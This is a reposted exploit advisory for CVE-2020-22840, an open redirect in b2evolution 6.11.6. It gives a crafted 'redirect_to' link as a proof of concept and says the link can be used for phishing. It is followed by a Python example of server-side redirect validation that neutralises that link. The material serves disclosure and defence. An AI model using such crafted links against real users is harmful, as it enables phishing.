This CHT
Posted November 4, 2022

# Exploit Title: b2evolution 6.11.6 - 'redirect_to' Open Redirect
# Date: 10/02/2021
# Exploit Author: Soham Bakore, Nakul Ratti
# Vendor Homepage: https://b2evolution.net/
# Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405
# Version: 6.11.6
# Tested on: latest version of Chrome, Firefox on Windows and Linux
# CVE : CVE-2020-22840

--------------------------Proof of Concept-----------------------

1. Send the following link:
http://127.0.0.1/htsrv/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fgoogle.com
to the unsuspecting user
2. The user will be redirected to Google.com or any other attacker controlled domain
3. This can be used to perform malicious phishing campaigns on unsuspecting users
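As an added example (not part of the post above and not b2evolution's own code), the server-side check that closes this class of bug: the `redirect_to` value is only honoured when it stays on the site, and the PoC value `http://google.com` falls back to the default. The allow-listed host `blog.example.org` and the helper names are assumptions for the example.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed for this example: the hosts a given deployment may redirect to.
ALLOWED_HOSTS = {"blog.example.org"}
DEFAULT_TARGET = "/"


def safe_redirect_target(redirect_to, allowed_hosts=ALLOWED_HOSTS, default=DEFAULT_TARGET):
    """Return a same-site redirect target, or `default` when the value would leave the site.

    Rejects absolute URLs to hosts outside the allow-list, protocol-relative
    //host values, backslash variants that browsers treat as slashes, and
    non-http(s) schemes such as javascript:.
    """
    if not redirect_to:
        return default
    # Browsers normalise backslashes to slashes in the authority position ("/\\evil").
    value = redirect_to.strip().replace("\\", "/")
    parts = urlsplit(value)
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return default
    if parts.netloc:
        # Absolute or protocol-relative URL: only allow-listed hosts, and keep just the path.
        if (parts.hostname or "") not in allowed_hosts:
            return default
        path = parts.path or "/"
    else:
        path = parts.path
    # A relative target must be a single-slash absolute path on this site.
    if not path.startswith("/") or path.startswith("//"):
        return default
    target = path
    if parts.query:
        target += "?" + parts.query
    if parts.fragment:
        target += "#" + parts.fragment
    return target


def redirect_target_for_request(request_url, **kwargs):
    """Extract redirect_to from a request URL such as the PoC link and validate it."""
    query = parse_qs(urlsplit(request_url).query)
    raw = query.get("redirect_to", [""])[0]
    return safe_redirect_target(raw, **kwargs)


if __name__ == "__main__":
    poc = ("http://127.0.0.1/htsrv/email_passthrough.php?email_ID=1&type=link"
           "&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fgoogle.com")
    print(redirect_target_for_request(poc))  # -> "/"
```

Plugging this in before the `Location:` header is set is the fix; the PoC link then lands on the site's own default page instead of the attacker-chosen host.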